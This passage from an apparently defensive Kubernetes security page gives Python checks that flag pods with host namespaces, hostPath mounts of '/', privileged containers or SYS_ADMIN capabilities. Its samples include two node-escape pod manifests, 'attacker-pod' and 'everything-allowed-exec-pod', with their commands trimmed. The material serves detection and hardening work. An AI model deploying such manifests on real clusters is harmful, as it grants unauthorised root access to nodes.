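    hostPath volumes, privileged containers and SYS_ADMIN/ALL capabilities.
    Input is the manifest as a dict (json.loads of the API body, or a YAML
    loader's output for the yaml files). These checks approximate the Pod
    Security Standards 'baseline' controls; they are this example's own logic."""
    spec = pod.get("spec") or {}
    out = []
    for key in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(key):
            out.append(f"{key}=true: pod shares that namespace with the node")
    for vol in spec.get("volumes") or []:
        hp = vol.get("hostPath")
        if hp is not None:
            path = hp.get("path", "")
            what = "the node root filesystem" if path == "/" else "a node path"
            out.append(f"volume {vol.get('name')!r} is a hostPath to {what} {path!r}")
    for c in (spec.get("containers") or []) + (spec.get("initContainers") or []):
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            out.append(f"container {c.get('name')!r} runs privileged")
        for cap in (sc.get("capabilities") or {}).get("add") or []:
            if str(cap).upper() in ("SYS_ADMIN", "ALL"):
                out.append(f"container {c.get('name')!r} adds capability {cap}")
    return out


def can_reach_node(pod: dict) -> bool:
    """True when the pod has either ingredient the escapes above use: a
    hostPath mount of '/' (chroot into it) or a privileged container."""
    spec = pod.get("spec") or {}
    root_mount = any((v.get("hostPath") or {}).get("path") == "/"
                     for v in spec.get("volumes") or [])
    privileged = any((c.get("securityContext") or {}).get("privileged")
                     for c in spec.get("containers") or [])
    return bool(root_mount or privileged)


# Samples: the two manifests from this page (command/args trimmed, they do not
# affect the checks) plus a constructed pod that passes.
SAMPLE_PODS = {
    "attacker-pod": {"apiVersion": "v1", "kind": "Pod",
        "metadata": {"name": "attacker-pod", "namespace": "default"},
        "spec": {"restartPolicy": "Never",
                 "volumes": [{"name": "host-fs", "hostPath": {"path": "/"}}],
                 "containers": [{"name": "attacker-pod", "image": "ubuntu",
                                 "volumeMounts": [{"name": "host-fs", "mountPath": "/root"}]}]}},
    "everything-allowed-exec-pod": {"apiVersion": "v1", "kind": "Pod",
        "metadata": {"name": "everything-allowed-exec-pod", "namespace": "default"},
        "spec": {"hostIPC": True, "hostNetwork": True, "hostPID": True,
                 "volumes": [{"name": "noderoot", "hostPath": {"path": "/"}}],
                 "containers": [{"name": "everything-allowed-pod", "image": "alpine",
                                 "securityContext": {"privileged": True},
                                 "volumeMounts": [{"mountPath": "/host", "name": "noderoot"}]}]}},
    "hardened-web": {"apiVersion": "v1", "kind": "Pod",
        "metadata": {"name": "web", "namespace": "default"},
        "spec": {"containers": [{"name": "web", "image": "nginx",
                                 "securityContext": {"runAsNonRoot": True,
                                                     "allowPrivilegeEscalation": False,
                                                     "capabilities": {"drop": ["ALL"]}}}]}},
}

if __name__ == "__main__":
    for name, pod in SAMPLE_PODS.items():
        print(name, "-> node access:", can_reach_node(pod))
        for finding in pod_findings(pod):
            print("   ", finding)
```

Wiring the same checks into a validating admission policy (or enforcing the baseline/restricted Pod Security Standard on the namespace) is what stops both manifests from being admitted in the first place.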